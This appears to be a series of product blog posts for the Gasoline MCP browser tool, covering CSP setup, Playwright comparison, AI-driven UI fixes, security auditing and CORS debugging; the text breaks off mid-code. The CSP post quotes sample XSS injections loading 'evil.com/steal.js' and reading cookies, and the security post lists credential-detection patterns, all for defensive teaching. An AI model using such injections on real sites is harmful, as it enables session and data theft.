Content Security Policy (CSP) Guide for Web Developers

Content Security Policy is one of the most effective defenses against XSS attacks, but it’s also one of the most confusing security headers to configure. Get it wrong and your site breaks. Get it right and an entire class of attacks becomes impossible.

Here’s a practical guide to CSP — what it does, how to build one, and how to use Gasoline to generate a policy from your actual traffic.

CSP tells the browser which sources are allowed to load resources on your page. If a script tries to load from an origin not in your policy, the browser blocks it.

Without CSP, an XSS vulnerability means an attacker can:

  • Load scripts from any domain (<script src="https://evil.com/steal.js">)
  • Execute inline JavaScript (<script>document.cookie</script>)
  • Inject styles that hide or modify content

With CSP, even if an attacker injects HTML, the browser refuses to execute scripts or load resources from unauthorized origins.

CSP is delivered as an HTTP response header:

Content-Security-Policy: default-src 'self'; script-src 'self' https://cdn.example.com; style-src 'self' 'unsafe-inline'

Or as a <meta> tag (with some limitations):

<meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'self' https://cdn.example.com">
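If you set the header from server code, the policy value is just directives joined with semicolons. A minimal sketch — the `buildCsp` helper and the Express wiring are illustrative, not a specific library's API:

```javascript
// Build a CSP header value from a directives map.
function buildCsp(directives) {
  return Object.entries(directives)
    .map(([name, sources]) => `${name} ${sources.join(' ')}`)
    .join('; ');
}

const policy = buildCsp({
  'default-src': ["'self'"],
  'script-src': ["'self'", 'https://cdn.example.com'],
});
// policy === "default-src 'self'; script-src 'self' https://cdn.example.com"

// In Express (assumed app object):
// app.use((req, res, next) => {
//   res.setHeader('Content-Security-Policy', policy);
//   next();
// });
```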

Each directive controls a resource type:

| Directive | Controls | Examples |
|---|---|---|
| default-src | Fallback for all resource types | 'self' |
| script-src | JavaScript | 'self' https://cdn.jsdelivr.net |
| style-src | CSS | 'self' 'unsafe-inline' |
| img-src | Images | 'self' https: data: |
| font-src | Web fonts | 'self' https://fonts.gstatic.com |
| connect-src | XHR, fetch, WebSocket | 'self' https://api.example.com wss://ws.example.com |
| frame-src | Iframes | 'self' https://www.youtube.com |
| media-src | Audio and video | 'self' |
| worker-src | Web Workers, Service Workers | 'self' |
| object-src | Plugins (Flash, Java) | 'none' |
| base-uri | <base> element | 'self' |
| form-action | Form submission targets | 'self' |

If a specific directive isn’t set, default-src is used as the fallback.

| Value | Meaning |
|---|---|
| 'self' | Same origin as the page |
| 'none' | Block everything |
| 'unsafe-inline' | Allow inline scripts/styles (weakens XSS protection) |
| 'unsafe-eval' | Allow eval(), new Function() (weakens XSS protection) |
| https: | Any HTTPS origin |
| data: | Data URIs (data:image/png;base64,...) |
| https://cdn.example.com | Specific origin |
| *.example.com | Wildcard subdomain |
| 'nonce-abc123' | Scripts/styles with matching nonce attribute |
| 'sha256-...' | Scripts/styles with matching hash |
A strict baseline policy looks like this:

Content-Security-Policy: default-src 'none'; script-src 'self'; style-src 'self'; img-src 'self'; font-src 'self'; connect-src 'self'

This allows only same-origin resources. Everything else is blocked.

Using a CDN for scripts? Add it:

script-src 'self' https://cdn.jsdelivr.net

Using Google Fonts? Add both origins:

style-src 'self' https://fonts.googleapis.com
font-src 'self' https://fonts.gstatic.com

API on a different domain? Add it to connect-src:

connect-src 'self' https://api.myapp.com

Not sure your policy is correct? Use Content-Security-Policy-Report-Only instead:

Content-Security-Policy-Report-Only: default-src 'self'; script-src 'self'; report-uri /csp-reports

The browser logs violations but doesn’t block anything. Review the reports, adjust the policy, then switch to enforcement.
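Violation reports arrive as JSON POSTs to your report-uri endpoint. A sketch of the report shape and a helper that extracts the fields you act on — the `summarizeCspReport` helper is illustrative, but the field names follow the CSP report format:

```javascript
// Pull the actionable fields out of a browser CSP violation report.
function summarizeCspReport(body) {
  const r = body['csp-report'] || {};
  return {
    page: r['document-uri'],
    directive: r['violated-directive'],
    blocked: r['blocked-uri'],
  };
}

// Example of what a browser POSTs to /csp-reports:
const example = {
  'csp-report': {
    'document-uri': 'https://myapp.com/checkout',
    'violated-directive': 'script-src',
    'blocked-uri': 'https://evil.com/steal.js',
  },
};
// summarizeCspReport(example).blocked === 'https://evil.com/steal.js'
```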

The biggest challenge with CSP is knowing which origins your page actually loads resources from. A modern web application might use:

  • Your own CDN for static assets
  • Google Fonts for typography
  • A JavaScript CDN (jsdelivr, unpkg, cdnjs)
  • An analytics service (Google Analytics, Segment)
  • A payment processor (Stripe)
  • An error tracker (Sentry)
  • Social media embeds
  • Ad networks

You could audit every <script>, <link>, <img>, and fetch() call in your codebase. Or you could let Gasoline do it.

Gasoline observes all network traffic during your browsing session and generates a CSP from what it sees:

generate({format: "csp"})

Strict — only high-confidence origins (observed 3+ times from 2+ pages):

generate({format: "csp", mode: "strict"})

This gives you the tightest possible policy. If a script was only loaded once, it might be ad injection or a browser extension — strict mode excludes it.

Moderate — includes medium-confidence origins:

generate({format: "csp", mode: "moderate"})

Good for most production use cases.

Report-Only — generates a Content-Security-Policy-Report-Only header:

generate({format: "csp", mode: "report_only"})

Deploy this first to find violations before enforcing.

Gasoline automatically excludes:

  • Browser extension origins (chrome-extension://, moz-extension://) — these shouldn’t be in your CSP
  • Development server origins — localhost on a different port than your app
  • Low-confidence origins — observed only once on one page (likely noise)

Don’t want analytics in your CSP? Exclude it:

generate({format: "csp", mode: "strict",
  exclude_origins: ["https://analytics.google.com", "https://www.googletagmanager.com"]})

The output includes:

  • Ready-to-use header string — copy-paste into your server config
  • Meta tag equivalent — for static sites
  • Per-origin details — which directive each origin maps to, confidence level, observation count
  • Filtered origins — what was excluded and why
  • Warnings — e.g., “only 3 pages observed — visit more pages for broader coverage”
A common mistake is allowing inline scripts:

script-src 'self' 'unsafe-inline'

This defeats the purpose of CSP for scripts. Inline scripts are the primary XSS vector. Use nonces or hashes instead:

<!-- Server generates a unique nonce per request -->
<script nonce="abc123">
  // This script is allowed
</script>

script-src 'self' 'nonce-abc123'

Another common mistake: your page loads fine, but all API calls fail because connect-src wasn’t set. connect-src controls fetch/XHR destinations — if your API is on a different origin, you need to allow it.

A related mistake is allowlisting an entire scheme:

script-src 'self' https:

This allows scripts from any HTTPS origin. An attacker can host a script on any HTTPS server and your CSP won’t block it. Be specific about which origins you allow.

Deploying a new CSP without testing breaks things. Always start with Content-Security-Policy-Report-Only, check for violations, then switch to enforcement.

Even in 2026, you should explicitly block plugins:

object-src 'none'

This prevents Flash and Java plugin exploitation (still a vector in some corporate environments).

Next.js uses inline scripts for hydration. You’ll need nonce-based CSP:

// middleware.ts
import { NextResponse } from 'next/server';

export function middleware(request) {
  const nonce = crypto.randomUUID();
  const csp = `script-src 'self' 'nonce-${nonce}'; style-src 'self' 'unsafe-inline';`;
  // Attach the policy and pass the nonce to components via a header
  const response = NextResponse.next();
  response.headers.set('Content-Security-Policy', csp);
  response.headers.set('x-nonce', nonce);
  return response;
}

CRA inlines a runtime chunk. Either:

  • Disable inline runtime: INLINE_RUNTIME_CHUNK=false
  • Use hash-based CSP for the known inline script

Vite’s dev server uses inline scripts and HMR WebSocket. Dev CSP will differ from production.

  1. Browse your app through its main flows with Gasoline connected
  2. Generate a CSP: generate({format: "csp", mode: "report_only"})
  3. Deploy in report-only mode and monitor for violations
  4. Adjust — add any legitimate origins that were missed
  5. Switch to enforcement once violations are resolved
  6. Regenerate periodically as your dependencies change

Gasoline takes the guesswork out of step 1 — you don’t have to audit your codebase manually. It sees every origin your page communicates with and builds the policy from observation.

Gasoline MCP vs Playwright: When to Use Which

Gasoline and Playwright aren’t competitors — they’re complementary. Playwright is a browser automation library for writing repeatable test scripts. Gasoline is an AI-powered browser observation and control layer. Gasoline can even generate Playwright tests.

But they serve different purposes, and knowing when to use each saves significant time.

| | Gasoline MCP | Playwright |
|---|---|---|
| Interface | Natural language via AI | JavaScript/TypeScript/Python API |
| Who uses it | Developers, PMs, QA — anyone | Developers and QA engineers |
| Setup | Install extension + npx gasoline-mcp | npm init playwright@latest |
| Selectors | Semantic (text=Submit, label=Email) | CSS, XPath, role, text, test-id |
| Test creation | Describe in English | Write code |
| Execution | AI runs it interactively | CLI or CI/CD pipeline |
| Debugging | Real-time browser observation | Trace viewer, screenshots |
| Maintenance | AI adapts to UI changes | Manual selector updates |
| CI/CD | Generate Playwright tests → run in CI | Native CI/CD support |
| Observability | Console, network, WebSocket, vitals, a11y | Limited (what you assert) |
| Performance | Built-in Web Vitals + perf_diff | Manual performance assertions |
| Cost | Free, open source | Free, open source |

You’re checking if a feature works. You don’t want to write a script — you want to try it.

Playwright: Write a script, run it, read the output, modify, repeat.

Gasoline: “Go to the checkout page, add two items, and complete the purchase. Tell me if anything breaks.”

For one-off verification, natural language is 10x faster.

Your test failed. Now what?

Playwright: Open the trace viewer. Scrub through screenshots. Check the assertion error message. Maybe add console.log statements to the test and re-run.

Gasoline: The AI already sees everything — console errors, network responses, WebSocket state, performance metrics. It can diagnose while testing.

observe({what: "error_bundles"})

One call returns the error with its correlated network requests and user actions. No trace viewer needed.

A designer renamed “Submit” to “Place Order” and restructured the form.

Playwright: Tests fail. You update selectors manually across 15 test files. You hope you caught them all.

Gasoline: The AI reads the page, finds the new button text, and continues. No manual updates.

A product manager wants to verify the user flow before release.

Playwright: Not an option without JavaScript knowledge.

Gasoline: “Walk through the signup flow and make sure it works.” The PM can do this themselves.

Playwright tests only check what you explicitly assert. If you don’t assert “no console errors,” you’ll never know about them.

Gasoline observes everything passively:

  • Console errors the test didn’t check for
  • Slow API responses the test didn’t measure
  • Layout shifts the test didn’t detect
  • Third-party script failures the test couldn’t see

Playwright: You can measure timing with custom code, but there’s no built-in Web Vitals collection or before/after comparison.

Gasoline: Web Vitals are captured automatically. Navigate or refresh, and you get a perf_diff with deltas, ratings, and a verdict. No custom code.

Playwright tests run headlessly in GitHub Actions, GitLab CI, or any CI system. They’re deterministic, repeatable, and fast.

Gasoline generates Playwright tests, but the actual CI execution is Playwright’s domain. Gasoline runs interactively with an AI assistant — it’s not designed to be a CI test runner.

Playwright can shard tests across multiple workers and run them in parallel. For a suite of 500 tests, this means finishing in minutes instead of hours.

Gasoline is single-session — one AI, one browser, one tab at a time.

Playwright supports Chromium, Firefox, and WebKit out of the box.

Gasoline’s extension currently runs in Chrome/Chromium only.

When you need a test that passes or fails the exact same way every time, Playwright’s explicit assertions are the right tool:

await expect(page.getByRole('heading')).toHaveText('Welcome back');
await expect(response.status()).toBe(200);

AI-driven testing is intelligent but non-deterministic — the AI might take different paths or interpret “verify it works” differently across runs.

Playwright can intercept and mock network requests, letting you test error states, slow responses, and edge cases without a real backend.

Gasoline observes real traffic — it doesn’t mock it.

The Best of Both: Generate Playwright from Gasoline

The power move: use Gasoline for exploration and Playwright for CI.

"Walk through the checkout flow — add an item, go to cart, enter
shipping info, and complete the purchase."

The AI runs the flow interactively, handling UI variations and reporting issues in real time.

"Generate a Playwright test from this session."
generate({format: "test", test_name: "checkout-flow",
  base_url: "http://localhost:3000",
  assert_network: true,
  assert_no_errors: true,
  assert_response_shape: true})

Gasoline produces a complete Playwright test:

import { test, expect } from '@playwright/test';

test('checkout-flow', async ({ page }) => {
  const consoleErrors = [];
  page.on('console', msg => {
    if (msg.type() === 'error') consoleErrors.push(msg.text());
  });

  await page.goto('http://localhost:3000/products');
  await page.getByRole('button', { name: 'Add to Cart' }).click();
  await page.getByRole('link', { name: 'Cart' }).click();
  await page.getByLabel('Address').fill('123 Main St');
  // ...

  expect(consoleErrors).toHaveLength(0);
});

The generated test runs in your CI pipeline like any other Playwright test. Deterministic, repeatable, fast.

The UI changed and the Playwright test fails. Instead of manually updating selectors:

"The checkout test is failing because the form changed.
Walk through the checkout flow again and generate a new test."

The AI adapts to the new UI, generates a fresh Playwright test, and you’re back in CI.

| Scenario | Use |
|---|---|
| Quick feature verification | Gasoline |
| CI/CD regression suite | Playwright (generated by Gasoline) |
| Debugging a test failure | Gasoline (better observability) |
| Non-developer testing | Gasoline |
| Cross-browser testing | Playwright |
| Performance monitoring | Gasoline (built-in vitals) |
| Network mocking | Playwright |
| Accessibility auditing | Gasoline (built-in axe-core) |
| Exploratory testing | Gasoline |
| 500+ test parallel execution | Playwright |
| Test maintenance | Gasoline (regenerate broken tests) |

The combined workflow:
  1. Develop — use Gasoline for real-time debugging and quick validation
  2. Generate — convert validated flows to Playwright tests
  3. CI — run Playwright tests on every push
  4. Maintain — when tests break, re-explore with Gasoline and regenerate

Gasoline doesn’t replace Playwright. It makes Playwright tests easier to create, easier to maintain, and easier to debug when they fail.

High-Speed AI-Driven Product Development with Gasoline MCP

What if your AI could see the UI, react to issues in real time, and tighten the feedback loop from “something looks wrong” to “it’s fixed” to under a minute? That’s the development speed Gasoline enables.

The speed of software development is the speed of feedback loops. How fast can you go from:

  • Idea to prototype?
  • Code change to visual result?
  • Bug report to fix deployed?
  • “This looks wrong” to “now it looks right”?

Every great product development methodology — agile, lean, continuous deployment — is fundamentally about making these loops shorter. The faster you iterate, the better the product gets.

AI coding agents just compressed the “code change” part of the loop from hours to seconds. But there’s a gap: the AI can write code fast, but it can’t see the result. It pushes a fix and then asks you, “Did that work?” You check the browser, describe what you see, and the loop slows back down to the speed of human communication.

Gasoline closes that gap. The AI sees the browser. The loop runs at machine speed.

Real-Time React: See It, Fix It, Verify It

Here’s what a high-speed development session looks like with Gasoline:

You: “The signup form looks broken on mobile. Fix it.”

AI observes the page:

observe({what: "screenshot"})
observe({what: "errors"})
observe({what: "vitals"})

The AI sees the screenshot — the form is overflowing its container, the submit button is off-screen. It sees a CSS warning in the console. It notes the LCP is 4.2s (should be under 2.5s).

AI diagnoses: “The form container has max-width: 600px but no horizontal padding. On screens narrower than 600px, the content bleeds. The submit button has position: absolute with a fixed top that pushes it below the viewport on mobile.”

AI writes the fix. Updates the CSS — adds responsive padding, changes the button positioning to relative.

AI verifies the fix:

observe({what: "screenshot"})
observe({what: "errors"})
observe({what: "vitals"})

The AI sees the updated screenshot — form fits the viewport, button is visible. No new errors. LCP dropped to 1.8s.

Total time: under 60 seconds. The AI saw the problem, understood the visual context, wrote the fix, and verified it — all without you describing anything beyond “looks broken on mobile.”

Traditional AI coding assistants are blind to the visual result of their work. They can reason about code, but they can’t reason about what the code looks like when rendered.

With Gasoline, the AI becomes design-aware:

observe({what: "screenshot"})

The AI takes a screenshot after every significant change. It can compare before and after, catch layout regressions, verify that a modal actually appeared, confirm that an error banner is gone.

observe({what: "vitals"})

Every navigation and interaction includes Web Vitals. The AI knows if a change improved or degraded LCP, CLS, or INP. No separate performance testing step — it’s built into the development loop.

observe({what: "errors"})

After every change, the AI checks for console errors. A CSS change that accidentally breaks a JavaScript selector? Caught immediately. A component that throws on re-render? Caught before you even look at the page.

interact({action: "list_interactive"})

The AI can verify that all expected interactive elements are present, visible, and accessible after a change. Did the redesign accidentally hide a button? The AI knows.

Here’s where it gets powerful. You’re not just fixing bugs — you’re refining the product at high speed.

You: “The dashboard feels cluttered. Make it cleaner.”

The AI screenshots the page, identifies the visual elements, and starts making targeted changes:

  1. Increases whitespace between sections
  2. Reduces the number of visible metrics (hides secondary ones behind a toggle)
  3. Simplifies the header
  4. Screenshots after each change to compare

You: “Better, but the chart is too small now.”

The AI adjusts, screenshots, verifies. Three iterations in the time it would have taken to write one Jira ticket describing the problem.

This is the Lovable model of development — rapid visual iteration where the AI handles implementation and you guide the direction. Every critique becomes a fix becomes a verification in under a minute.

The AI doesn’t just respond to your feedback — it proactively catches issues through Gasoline’s continuous capture:

The AI monitors observe({what: "errors"}) and observe({what: "vitals"}) as you browse. It can interrupt with: “I noticed a new TypeError appearing on the settings page — it started after the last commit. Want me to investigate?”

Run your natural language test scripts against production:

1. Navigate to the homepage
2. Verify no console errors
3. Verify LCP is under 2.5 seconds
4. Click "Sign Up"
5. Verify the form loads without errors
6. Navigate to /dashboard
7. Verify the WebSocket connects successfully

If anything regresses, the AI has the full context: the error, the network state, the visual state, the performance metrics. It can start debugging before you even know there’s a problem.

Take a screenshot on desktop, then tell the AI to check the responsive viewport:

interact({action: "execute_js",
  script: "window.innerWidth + 'x' + window.innerHeight"})

The AI can systematically check different viewport sizes and report visual issues at each breakpoint.

Each individual capability — screenshots, error checking, Web Vitals, interactive element discovery — is useful on its own. But the compound effect is what transforms development speed:

| Traditional Loop | Gasoline Loop |
|---|---|
| Write code | Write code |
| Switch to browser | AI checks browser automatically |
| Visually inspect | AI analyzes screenshot |
| Open DevTools if something looks wrong | AI already checked errors |
| Check Network tab | AI already checked network |
| Describe problem to AI | AI already knows the problem |
| Wait for AI suggestion | AI already wrote the fix |
| Apply fix, repeat | Fix is applied, verified, and committed |

The traditional loop has 8 steps with human bottlenecks at each one. The Gasoline loop has 3 steps that run at machine speed.

Designers and PMs become directly effective. They describe what they want in natural language. The AI implements and verifies it in real time. The feedback loop between “I want this to look different” and “it looks different” drops from days (designer → Jira ticket → engineer → PR → deploy → review) to minutes.

Engineers focus on architecture, not pixel-pushing. The AI handles the visual iteration while engineers work on the hard problems — data models, system design, performance optimization, security.

QA shifts from catching bugs to preventing them. When the AI verifies every change visually and functionally in real time, bugs get caught at the moment they’re introduced — not three sprints later when QA runs the regression suite.

Product velocity compounds. Faster feedback loops mean more iterations per day. More iterations mean better product quality. Better quality means less time spent on bugs and more time on features. The cycle accelerates.

The gap between “AI can write code” and “AI can build products” is context. An AI that can see the browser, check the errors, verify the visuals, and confirm the performance isn’t just a coding assistant — it’s a development partner that operates at the speed you think.

Gasoline provides that context. Four tools, zero setup, everything the AI needs to see your product the way your users see it.

The fastest development teams in the world will be the ones where the feedback loop runs in seconds, not days. That future starts with giving the AI eyes.

How Gasoline MCP Improves Your Application Security

Most developers discover security issues in production. A penetration test finds exposed credentials in an API response. A security review flags missing headers. A breach notification reveals that a third-party script was exfiltrating form data.

Gasoline MCP flips the timeline. Your AI assistant audits security while you develop, catching issues before they ship.

In the typical development cycle, security checks happen late:

  1. Development — features built, tested, deployed
  2. Security review — weeks later, if at all
  3. Penetration test — quarterly, expensive, findings arrive after context is lost
  4. Incident — the worst time to learn about a vulnerability

Every step between writing the code and finding the issue adds cost. A missing HttpOnly flag caught during development takes 30 seconds to fix. The same flag caught in a pen test takes a meeting, a ticket, a sprint, and a deploy.

Real-Time Security Auditing During Development

Gasoline gives your AI assistant six categories of security checks that run against live browser traffic:

Your AI can scan every network request and response for exposed secrets:

observe({what: "security_audit", checks: ["credentials"]})

This catches:

  • AWS Access Keys (AKIA...) in API responses
  • GitHub PATs (ghp_..., ghs_...) in console logs
  • Stripe keys (sk_test_..., sk_live_...) in client-side code
  • JWTs in URL parameters (a common mistake)
  • Bearer tokens in responses that shouldn’t contain them
  • Private keys accidentally bundled in source maps

Every detection runs regex plus validation (Luhn algorithm for credit cards, structure checks for JWTs) to minimize false positives.
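For illustration, here is the kind of Luhn check that separates a real card number from a random 16-digit string — a sketch of the idea, not Gasoline's actual validator:

```javascript
// Luhn checksum: from the right, double every second digit,
// subtract 9 from doubled values over 9, and require sum % 10 === 0.
function luhnValid(digits) {
  const d = digits.replace(/\D/g, '');
  let sum = 0;
  for (let i = 0; i < d.length; i++) {
    let n = Number(d[d.length - 1 - i]);
    if (i % 2 === 1) {
      n *= 2;
      if (n > 9) n -= 9;
    }
    sum += n;
  }
  return d.length >= 13 && sum % 10 === 0;
}

luhnValid('4242 4242 4242 4242'); // true — a well-known test card number
luhnValid('1234 5678 9012 3456'); // false — fails the checksum
```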

observe({what: "security_audit", checks: ["pii"]})

Finds personal data flowing through your application:

  • Social Security Numbers
  • Credit card numbers (with Luhn validation — not just pattern matching)
  • Email addresses in unexpected API responses
  • Phone numbers in contexts where they shouldn’t appear

This matters for GDPR, CCPA, and HIPAA compliance. If your user list API is returning full SSNs when the frontend only needs names, your AI catches it during development.

observe({what: "security_audit", checks: ["headers"]})

Validates that your responses include critical security headers:

| Header | What It Prevents |
|---|---|
| Strict-Transport-Security | Downgrade attacks, cookie hijacking |
| X-Content-Type-Options | MIME sniffing attacks |
| X-Frame-Options | Clickjacking |
| Content-Security-Policy | XSS, injection attacks |
| Referrer-Policy | Referrer leakage to third parties |
| Permissions-Policy | Unauthorized browser feature access |

Missing any of these? Your AI knows immediately — and can fix it.

observe({what: "security_audit", checks: ["cookies"]})

Session cookies without HttpOnly are accessible to XSS attacks. Cookies without Secure can be intercepted over HTTP. Missing SameSite enables CSRF. Gasoline checks every cookie against every flag and rates severity based on whether it’s a session cookie.
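The fix is usually one line wherever the cookie is set. A sketch of the Set-Cookie value the audit wants to see — the helper and cookie names are illustrative:

```javascript
// Build a session Set-Cookie value with all three protective flags.
function sessionCookie(name, value) {
  // HttpOnly: not readable via document.cookie (blunts XSS theft)
  // Secure: only sent over HTTPS
  // SameSite=Lax: blocks most cross-site request forgery
  return `${name}=${value}; HttpOnly; Secure; SameSite=Lax; Path=/`;
}

sessionCookie('sid', 'abc123');
// → 'sid=abc123; HttpOnly; Secure; SameSite=Lax; Path=/'
```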

observe({what: "security_audit", checks: ["transport"]})

Detects:

  • HTTP usage on non-localhost origins (unencrypted traffic)
  • Mixed content (HTTPS page loading HTTP resources)
  • HTTPS downgrade patterns

observe({what: "security_audit", checks: ["auth"]})

Identifies API endpoints that return PII without requiring authentication. If /api/users/123 returns a full user profile without an Authorization header, that’s a finding.

Third-party scripts are one of the largest attack surfaces in modern web applications. Every <script src="..."> from an external CDN is a trust decision.

observe({what: "third_party_audit"})

Gasoline classifies every third-party origin by risk:

  • Critical risk — scripts from suspicious domains, data exfiltration patterns
  • High risk — scripts from unknown origins, data sent to third parties with POST requests
  • Medium risk — non-essential third-party resources, suspicious TLDs (.xyz, .top, .click)
  • Low risk — fonts and images from known CDNs

It detects domain generation algorithm (DGA) patterns — high-entropy hostnames that indicate malware communication. It flags when your application sends PII-containing form data to third-party origins.
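High-entropy detection can be as simple as a Shannon-entropy score over a hostname label. A sketch of that signal — the helper name is illustrative, and Gasoline's actual heuristic may combine more features:

```javascript
// Shannon entropy (bits per character) of a hostname label.
// Random-looking DGA labels score much higher than dictionary words.
function labelEntropy(label) {
  const counts = {};
  for (const ch of label) counts[ch] = (counts[ch] || 0) + 1;
  let h = 0;
  for (const c of Object.values(counts)) {
    const p = c / label.length;
    h -= p * Math.log2(p);
  }
  return h;
}

labelEntropy('google');       // low — ordinary word, repeated letters
labelEntropy('xk7qz9w2mfp4'); // higher — random-looking, DGA-like
```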

And it’s configurable. Specify your first-party origins and custom allow/block lists:

observe({what: "third_party_audit",
  first_party_origins: ["https://api.myapp.com"],
  custom_lists: {
    allowed: ["https://cdn.mycompany.com"],
    blocked: ["https://suspicious-tracker.xyz"]
  }})

Security isn’t just about finding issues — it’s about making sure fixes stay fixed.

// Before your deploy
configure({action: "diff_sessions", session_action: "capture", name: "before-deploy"})

// After
configure({action: "diff_sessions", session_action: "capture", name: "after-deploy"})

// Compare
configure({action: "diff_sessions",
  session_action: "compare",
  compare_a: "before-deploy",
  compare_b: "after-deploy"})

The security_diff mode specifically tracks:

  • Headers removed — did someone drop the CSP header?
  • Cookie flags removed — did HttpOnly get lost in a refactor?
  • Authentication removed — did an endpoint become public?
  • Transport downgrades — did something switch from HTTPS to HTTP?

Each change is severity-rated. A removed CSP header is high severity. A transport downgrade is critical.

Gasoline doesn’t just find problems — it generates the artifacts you need to fix and prevent them.

generate({format: "csp", mode: "strict"})

Gasoline observes which origins your page actually loads resources from during development and generates a CSP that allows exactly those origins — nothing more. It uses a confidence scoring system (3+ observations from 2+ pages = high confidence) to filter out extension noise and ad injection.

generate({format: "sri"})

Every third-party script and stylesheet gets a SHA-384 hash. If a CDN is compromised and serves modified JavaScript, the browser refuses to execute it.

The output includes ready-to-paste HTML tags:

<script src="https://cdn.example.com/lib.js"
        integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8w"
        crossorigin="anonymous"></script>

Even before auditing, Gasoline protects against accidental data exposure. The redaction engine automatically scrubs sensitive data from all MCP tool responses before they reach the AI:

  • AWS keys become [REDACTED:aws-key]
  • Bearer tokens become [REDACTED:bearer-token]
  • Credit card numbers become [REDACTED:credit-card]
  • SSNs become [REDACTED:ssn]

This is a double safety net. The extension strips auth headers before data reaches the server. The server’s redaction engine catches anything else before it reaches the AI. Two layers, zero configuration.
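Conceptually, redaction is pattern-to-placeholder rewriting before text leaves the tool. A simplified sketch — these two patterns are illustrations, not Gasoline's actual rule set:

```javascript
// Illustrative redaction rules: pattern name → regex.
const RULES = [
  { name: 'aws-key', re: /AKIA[0-9A-Z]{16}/g },
  { name: 'bearer-token', re: /Bearer\s+[A-Za-z0-9\-._~+\/]+=*/g },
];

// Replace every match with a labeled placeholder.
function redact(text) {
  return RULES.reduce(
    (out, { name, re }) => out.replace(re, `[REDACTED:${name}]`),
    text
  );
}

redact('Authorization: Bearer abc123.def');
// → 'Authorization: [REDACTED:bearer-token]'
```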

Here’s the workflow that makes Gasoline transformative for security:

  1. Develop normally — write code, test features
  2. AI audits continuously — security checks run against live traffic
  3. Issues found immediately — in the same terminal where you’re coding
  4. Fix in context — the AI has the code open and the finding in hand
  5. Verify the fix — re-run the audit, confirm the finding is gone
  6. Prevent regression — capture a security snapshot, compare after future changes

The entire cycle takes minutes, not months. No separate tool. No context switch. No ticket in a backlog that nobody reads.

For developers: Security becomes part of your flow, not an interruption to it. The AI catches what you’d need a security expert to find — and you fix it while the code is still fresh in your mind.

For security teams: Shift-left isn’t a buzzword anymore. Developers arrive at security review with most issues already caught and fixed. Reviews focus on architecture and design, not missing headers.

For compliance: Every audit finding is captured with timestamp, severity, and evidence. SARIF export integrates directly with GitHub Code Scanning. The audit log records every security check the AI performed.

For enterprises: Zero data egress. All security scanning happens on the developer’s machine. No credentials sent to cloud services. No browser traffic leaving the network. Localhost only, zero dependencies, open source.

Install Gasoline, open your application, and ask your AI:

“Run a full security audit of this page and tell me what you find.”

You might be surprised what’s been hiding in plain sight.

How to Debug CORS Errors with AI Using Gasoline MCP

CORS errors are the most misleading errors in web development. The browser tells you “access has been blocked” — but the actual problem could be a missing header, a wrong origin, a preflight failure, a credentials mismatch, or a server that’s simply crashing and returning a 500 without CORS headers.

Here’s how to use Gasoline MCP to let your AI assistant see the full picture and fix CORS issues in minutes instead of hours.

The browser console shows you something like:

Access to fetch at 'https://api.example.com/users' from origin 'http://localhost:3000'
has been blocked by CORS policy: No 'Access-Control-Allow-Origin' header is present
on the requested resource.

This tells you what happened but not why. Common causes:

  1. The server doesn’t send CORS headers at all — needs configuration
  2. The server sends the wrong origin — * doesn’t work with credentials
  3. The preflight OPTIONS request fails — the server doesn’t handle OPTIONS
  4. The server errors out — a 500 response won’t have CORS headers either
  5. A proxy strips headers — nginx, Cloudflare, or your reverse proxy eats the headers
  6. Credentials mode mismatch — withCredentials: true requires an explicit origin, not *

Chrome DevTools shows the failed request in the Network tab, but the response body is hidden for CORS-blocked requests. You can’t see what the server actually returned. You’re debugging blind.

With Gasoline connected, your AI can see the error, the network request details, and the response headers — everything needed to diagnose the root cause.

observe({what: "errors"})

The AI sees the CORS error message with the exact URL, origin, and which header is missing.

observe({what: "network_bodies", url: "/api/users"})

This shows the full request/response pair:

  • Request headers — the Origin header the browser sent
  • Response headers — whether Access-Control-Allow-Origin is present, and what value it has
  • Response status — is it a 200 with missing headers, or a 500 that also lacks headers?
  • Response body — the actual error payload (which Chrome hides for CORS failures)

observe({what: "network_waterfall", url: "/api/users"})

The waterfall shows if there are two requests — the preflight OPTIONS and the actual request. If the OPTIONS request fails or returns the wrong status, the browser never sends the real request.
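The rule for when a preflight happens can be sketched in code. This is a simplified model of the browser’s decision (the authoritative rules live in the Fetch spec), and the function name is illustrative, not a real API:

```javascript
// Simplified sketch of the browser's preflight decision.
// "Simple" requests skip the OPTIONS preflight entirely.
const SIMPLE_METHODS = new Set(['GET', 'HEAD', 'POST']);
const SIMPLE_HEADERS = new Set([
  'accept', 'accept-language', 'content-language', 'content-type',
]);
const SIMPLE_CONTENT_TYPES = new Set([
  'application/x-www-form-urlencoded', 'multipart/form-data', 'text/plain',
]);

function needsPreflight(method, headers = {}) {
  if (!SIMPLE_METHODS.has(method.toUpperCase())) return true;
  for (const [name, value] of Object.entries(headers)) {
    const lower = name.toLowerCase();
    if (!SIMPLE_HEADERS.has(lower)) return true; // custom header => preflight
    if (lower === 'content-type' &&
        !SIMPLE_CONTENT_TYPES.has(value.split(';')[0].trim())) {
      return true; // e.g. application/json => preflight
    }
  }
  return false;
}

needsPreflight('POST', { 'Content-Type': 'application/json' }); // → true
needsPreflight('GET'); // → false
```

This is why a plain GET works while your JSON POST suddenly fails: the POST triggers an OPTIONS request the server may not handle.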

observe({what: "timeline", include: ["network", "errors"]})

The timeline shows the sequence: did the preflight succeed? Did the main request fire? When did the error appear relative to the request? This catches timing-related CORS issues like the server sending headers on GET but not POST.

What the AI sees: Request to api.example.com, response status 200, no Access-Control-Allow-Origin header.

The fix: Add CORS headers to the server. The AI can look at your server code and add the appropriate middleware:

// Express
const cors = require('cors');
app.use(cors({ origin: 'http://localhost:3000' }));

// Go
w.Header().Set("Access-Control-Allow-Origin", "http://localhost:3000")

// Nginx
add_header 'Access-Control-Allow-Origin' 'http://localhost:3000';

What the AI sees: Request to /api/users, response status 500, body contains {"error": "database connection failed"}, no CORS headers.

The real problem: The server is crashing, and crash responses don’t go through the CORS middleware. The CORS error is a red herring.

This is why seeing the response body matters. Without Gasoline, you’d spend an hour debugging CORS headers when the actual issue is a database connection string.
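The fix pattern can be sketched framework-agnostically: wrap every handler so that even a thrown error produces a response carrying the CORS headers. The request/response shapes below are illustrative, not a real framework API:

```javascript
// Sketch: attach CORS headers even when the handler crashes, so the browser
// can surface the real 500 body instead of a misleading CORS error.
const CORS_HEADERS = { 'Access-Control-Allow-Origin': 'http://localhost:3000' };

function withCors(handler) {
  return async (req) => {
    try {
      const res = await handler(req);
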